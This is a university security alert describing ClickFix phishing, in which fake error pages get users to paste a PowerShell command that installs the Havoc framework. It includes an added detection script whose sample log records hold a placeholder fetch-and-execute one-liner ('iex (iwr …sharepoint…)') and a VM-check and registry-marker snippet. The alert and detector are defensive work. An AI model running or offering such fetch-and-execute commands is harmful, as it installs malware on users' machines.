
March 2024: ClickFix Attacks Trick People Into Following Commands that Install Malware

Example of a ClickFix phish

Threat Alert: ClickFix Attacks Trick People Into Following Commands that Install Malware

  • ClickFix is a social-engineering tactic in which threat actors create websites or phishing attachments that display fake errors and then prompt the user to click a button to fix them. It has become increasingly popular among cybercriminals, who use it to deploy a variety of malware.
  • For example, threat actors send emails or post messages on websites, such as a "restricted notice", that prompt the user to download an HTML or other document.
  • When the user opens the document, an error message appears telling the user to fix the error by manually updating the DNS cache or performing some other task. The message also contains a button labelled "How to fix" or similar.
  • Clicking the button silently copies a PowerShell command to the Windows clipboard and then displays instructions for entering that command to perform the task (e.g., press "Control+V" and then "Enter").
  • The command attempts to launch another PowerShell script hosted on the threat actor's SharePoint Server.
  • That script checks whether the device is a sandbox and modifies the Windows Registry to add a value indicating that the script has already run on the device.
  • It then checks whether Python is installed on the device and, if not, installs the interpreter.
  • Finally, a Python script is downloaded from the same SharePoint site and executed to deploy Havoc, an open-source post-exploitation framework that gives attackers a foothold inside the network.
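The chain above turned into detection logic, as an added example that is not UCSF's code: it scores the text of PowerShell script-block log entries against the stages the alert describes (remote fetch-and-execute, sandbox check, registry marker, Python install). The log records, host names and registry path are constructed placeholders, not real telemetry.

```python
import re

# One indicator per stage of the ClickFix chain described in the alert.
INDICATORS = {
    # stage 1: the pasted one-liner downloads a second script and runs it in memory
    "remote_fetch": re.compile(r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b", re.I),
    "dynamic_exec": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "sharepoint_host": re.compile(r"https?://[^\s'\"]*sharepoint\.", re.I),
    # stage 2: sandbox/VM check and a registry value marking "already ran"
    "vm_check": re.compile(r"Win32_(ComputerSystem|BIOS)|VirtualBox|VMware|Hyper-V", re.I),
    "registry_marker": re.compile(r"\b(New|Set)-ItemProperty\b.*HK(CU|LM):", re.I | re.S),
    # stage 3: Python interpreter install and a .py payload
    "python_stage": re.compile(r"python(\.org|-3[\d.]*|\.exe)|\b\w+\.py\b", re.I),
}

def score_script_block(text):
    """Return {"verdict", "hits"} for one script-block text (e.g. Event ID 4104 ScriptBlockText)."""
    hits = [name for name, pat in INDICATORS.items() if pat.search(text)]
    # Fetch piped straight into execution is the ClickFix hallmark; several
    # stage-2/3 indicators together are equally telling for the follow-on script.
    if ("remote_fetch" in hits and "dynamic_exec" in hits) or len(hits) >= 3:
        verdict = "high"
    elif len(hits) == 2:
        verdict = "medium"
    elif hits:
        verdict = "low"
    else:
        verdict = "none"
    return {"verdict": verdict, "hits": hits}

def triage(records):
    """Score a batch of log records and keep only those worth an analyst's attention."""
    flagged = []
    for rec in records:
        result = score_script_block(rec["ScriptBlockText"])
        if result["verdict"] in ("medium", "high"):
            flagged.append({"id": rec["id"], **result})
    return flagged

# Constructed sample records (not real telemetry); hosts and paths are placeholders.
SAMPLE_RECORDS = [
    {"id": "benign-1", "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"id": "benign-2", "ScriptBlockText": "Invoke-WebRequest https://intranet.example/report.csv -OutFile report.csv"},
    {"id": "stage-1", "ScriptBlockText": "iex (iwr https://PLACEHOLDER-TENANT.sharepoint.example/s2.ps1)"},
    {"id": "stage-2", "ScriptBlockText": "if ((Get-CimInstance Win32_ComputerSystem).Model -match 'VMware') { exit }; "
     "New-ItemProperty -Path HKCU:\\Software\\PLACEHOLDER -Name Ran -Value 1; "
     "if (-not (Get-Command python -ErrorAction SilentlyContinue)) { iwr https://PLACEHOLDER/python-3.12.exe -OutFile p.exe }; "
     "python stage3.py"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_RECORDS):
        print(hit["id"], hit["verdict"], ", ".join(hit["hits"]))
```

A plain download to a file (benign-2) scores "low" and is not flagged, which is the point of requiring fetch and execute together.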

Key Action: Stay Alert!

  • UCSF will never ask you to perform commands in an email or on a website.
  • Be wary of error messages on unexpected websites or apps.
  • Keep your software and OS updated to prevent malware exploits.
  • Close all browser windows and clear the clipboard, because it likely contains the malicious command.
  • If you visit a site where you are presented with a fake error message, take a screenshot and report it to the UCSF Service Desk.